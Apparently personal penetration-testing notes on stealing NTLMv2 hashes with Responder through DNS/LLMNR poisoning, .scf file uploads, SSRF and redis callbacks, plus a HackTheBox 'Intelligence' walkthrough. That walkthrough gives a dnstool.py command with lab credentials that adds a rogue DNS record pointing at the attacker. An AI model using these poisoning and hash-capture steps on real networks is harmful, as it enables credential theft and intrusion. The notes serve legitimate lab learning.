We basically poison DNS so that whenever the router does not know where to forward a connection to, it will forward it to us.
Responder:
responder -I <tun0> -dw
##This will capture NTMLv2 Hashes that can cracked with hashcat.
Different strategies to get NTLMv2 Hashes:
If there is anywhere where we can upload a file and they allow .scf files it means we can replace the file to callback to our SMB share being hosted by Responder which we can then crack.
Notice the SMB share, we should switch the IP to the corresponding one.
SSRF + Responder
Server-Side request forgery, allows an attacker to "induce" the application to make requests to places that it was intended to.
Here the application was some sort of Web Browser that allowed us intercept the traffic by pointing the website to make a request to our webserver using Responder.
Notice that when we provided the application with the url of our webserver on port 80 (ofc since https is encrypted we wont be able to do this). We were able to take advantage of the SSRF.
Same concept here, if we can point redis to point to our SMB share we will be able to capture hashes as well.
Poisoning DNS and Default Cred Web request
During the machine called Intelligence from HackTheBox I was able to capture a hash because the user was making a request to all the websevers that started with the word "web"
More of the script that the user was using to authenticate was this:
βββββββ¬βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β File: downdetector.ps1 <UTF-16LE>
ββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
1 β # Check web server status. Scheduled to run every 5min
2 β Import-Module ActiveDirectory
3 β foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
4 β try {
5 β $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
6 β if(.StatusCode -ne 200) {
7 β Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
8 β }
9 β } catch {}
10 β }
We can use the requests its making to the webservers that start with the name web*
If we have valid credentials to the domain we can start our own and poison dns so that our own webserver starts with that name and we can capture the hash of the user Ted Graves.
// python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -r weblyethar -a add -t A -d 10.10.14.7 10.10.10.248
Notice that the -d is for us to provide our IP and then the IP of our target.
